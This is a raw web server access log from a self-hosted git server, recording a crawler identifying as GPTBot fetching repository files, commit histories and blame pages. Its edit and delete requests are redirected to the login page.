"https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/C++Project/industrial-comm/build" -[17/Feb/2026:17:30:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make?display=rendered" [Client 74.7.227.38] [Length 11158] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" -[17/Feb/2026:17:30:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/pyvenv.cfg?display=source" [Client 74.7.227.38] [Length 11475] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/pyvenv.cfg" -[17/Feb/2026:17:30:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/controller-next-todo.md" [Client 74.7.227.38] [Length 1924] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/controller-next-todo.md" -[17/Feb/2026:17:30:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/QUICKSTART.md?display=source" [Client 74.7.227.38] [Length 15434] [Gzip 4.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/QUICKSTART.md" -[17/Feb/2026:17:30:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/QUICKSTART.md?display=rendered" [Client 74.7.227.38] [Length 12977] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/QUICKSTART.md" -[17/Feb/2026:17:30:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/DOCKER_QUICKSTART.md?display=rendered" [Client 74.7.227.38] [Length 14529] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/DOCKER_QUICKSTART.md" -[17/Feb/2026:17:30:07 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/.Backup/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom6.png" -[17/Feb/2026:17:30:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/.Backup/html/assets/images/ControlRoom6.png" -[17/Feb/2026:17:30:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc?display=rendered" [Client 74.7.227.38] [Length 11006] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:17:30:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PythonTest/my_database.db" [Client 74.7.227.38] [Length 9811] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PythonTest/my_database.db" -[17/Feb/2026:17:30:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/ReadMe.md" [Client 74.7.227.38] [Length 12185] [Gzip 2.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor" -[17/Feb/2026:17:30:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/gold_monitor.spec" [Client 74.7.227.38] [Length 12481] [Gzip 3.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor" -[17/Feb/2026:17:30:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/gold_monitor.log" [Client 74.7.227.38] [Length 11667] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor" -[17/Feb/2026:17:30:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/assets_data.csv" [Client 74.7.227.38] [Length 9779] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/assets_data.csv" -[17/Feb/2026:17:30:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/nos_setup.exe" [Client 74.7.227.38] [Length 9791] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/nos_setup.exe" -[17/Feb/2026:17:30:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/user_assets.csv" [Client 74.7.227.38] [Length 9773] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/user_assets.csv" -[17/Feb/2026:17:30:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher" [Client 74.7.227.38] [Length 11081] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot" -[17/Feb/2026:17:30:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresPatrol/build_exe.bat" [Client 74.7.227.38] [Length 2135] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build_exe.bat" -[17/Feb/2026:17:30:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/notifier.py" [Client 74.7.227.38] [Length 18288] [Gzip 5.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot" -[17/Feb/2026:17:30:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10037] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&project=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:17:30:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10010] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&sort=mostcomment&state=open&type=all" -[17/Feb/2026:17:30:14 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/ReadMe.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/ReadMe.md" -[17/Feb/2026:17:30:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/ReadMe.md" -[17/Feb/2026:17:30:15 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/gold_monitor.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/gold_monitor.spec" -[17/Feb/2026:17:30:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/gold_monitor.spec" -[17/Feb/2026:17:30:15 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/gold_monitor.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/gold_monitor.log" -[17/Feb/2026:17:30:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/gold_monitor.log" -[17/Feb/2026:17:30:16 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/gold_monitor.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/gold_monitor.log" -[17/Feb/2026:17:30:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/gold_monitor.log" -[17/Feb/2026:17:30:16 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/gold_monitor.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/gold_monitor.spec" -[17/Feb/2026:17:30:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/gold_monitor.spec" -[17/Feb/2026:17:30:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/gold_monitor.spec" [Client 74.7.227.38] [Length 9783] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/gold_monitor.spec" -[17/Feb/2026:17:30:17 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldPilot/data_fetcher" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher" -[17/Feb/2026:17:30:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldPilot/data_fetcher" -[17/Feb/2026:17:30:18 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldPilot/data_fetcher" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher" -[17/Feb/2026:17:30:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldPilot/data_fetcher" -[17/Feb/2026:17:30:18 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldPilot/notifier.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/notifier.py" -[17/Feb/2026:17:30:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldPilot/notifier.py" -[17/Feb/2026:17:30:19 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldPilot/notifier.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/notifier.py" -[17/Feb/2026:17:30:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldPilot/notifier.py" -[17/Feb/2026:17:30:19 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/GoldPilot/data_fetcher" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher" -[17/Feb/2026:17:30:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/GoldPilot/data_fetcher" -[17/Feb/2026:17:30:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__pycache__" [Client 74.7.227.38] [Length 10588] [Gzip 3.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher" -[17/Feb/2026:17:30:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/krx_gold_fetcher.py" [Client 74.7.227.38] [Length 12427] [Gzip 3.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher" -[17/Feb/2026:17:30:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/api_fetcher.py" [Client 74.7.227.38] [Length 13176] [Gzip 3.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher" -[17/Feb/2026:17:30:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/usdkrw_fetcher.py" [Client 74.7.227.38] [Length 12682] [Gzip 3.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher" -[17/Feb/2026:17:30:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/investing_fetcher.py" [Client 74.7.227.38] [Length 13269] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher" -[17/Feb/2026:17:30:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__init__.py" [Client 74.7.227.38] [Length 13343] [Gzip 4.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher" -[17/Feb/2026:17:30:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/ReadMe.md" [Client 74.7.227.38] [Length 9779] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/ReadMe.md" -[17/Feb/2026:17:30:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/data_fetcher" [Client 74.7.227.38] [Length 9781] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher" -[17/Feb/2026:17:30:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/notifier.py" [Client 74.7.227.38] [Length 9780] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/notifier.py" -[17/Feb/2026:17:30:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldMonitor/gold_monitor.spec" [Client 74.7.227.38] [Length 11776] [Gzip 5.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/gold_monitor.spec" -[17/Feb/2026:17:30:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/gold_monitor.log" [Client 74.7.227.38] [Length 9781] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/gold_monitor.log" -[17/Feb/2026:17:30:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/data_fetcher/__pycache__" [Client 74.7.227.38] [Length 9795] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__pycache__" -[17/Feb/2026:17:30:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/data_fetcher/krx_gold_fetcher.py" [Client 74.7.227.38] [Length 9811] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/krx_gold_fetcher.py" -[17/Feb/2026:17:30:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldPilot/data_fetcher/api_fetcher.py" [Client 74.7.227.38] [Length 1531] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/api_fetcher.py" -[17/Feb/2026:17:30:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldPilot/data_fetcher/krx_gold_fetcher.py" [Client 74.7.227.38] [Length 11747] [Gzip 4.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/krx_gold_fetcher.py" -[17/Feb/2026:17:30:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/data_fetcher/investing_fetcher.py" [Client 74.7.227.38] [Length 9805] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/investing_fetcher.py" -[17/Feb/2026:17:30:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldPilot/data_fetcher/krx_gold_fetcher.py" [Client 74.7.227.38] [Length 635] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/krx_gold_fetcher.py" -[17/Feb/2026:17:30:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldPilot/data_fetcher/__init__.py" [Client 74.7.227.38] [Length 1858] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__init__.py" -[17/Feb/2026:17:30:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldPilot/data_fetcher/krx_gold_fetcher.py" [Client 74.7.227.38] [Length 894] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/krx_gold_fetcher.py" -[17/Feb/2026:17:30:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldPilot/data_fetcher/investing_fetcher.py" [Client 74.7.227.38] [Length 12818] [Gzip 5.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/investing_fetcher.py" -[17/Feb/2026:17:30:30 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor/gold_monitor.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 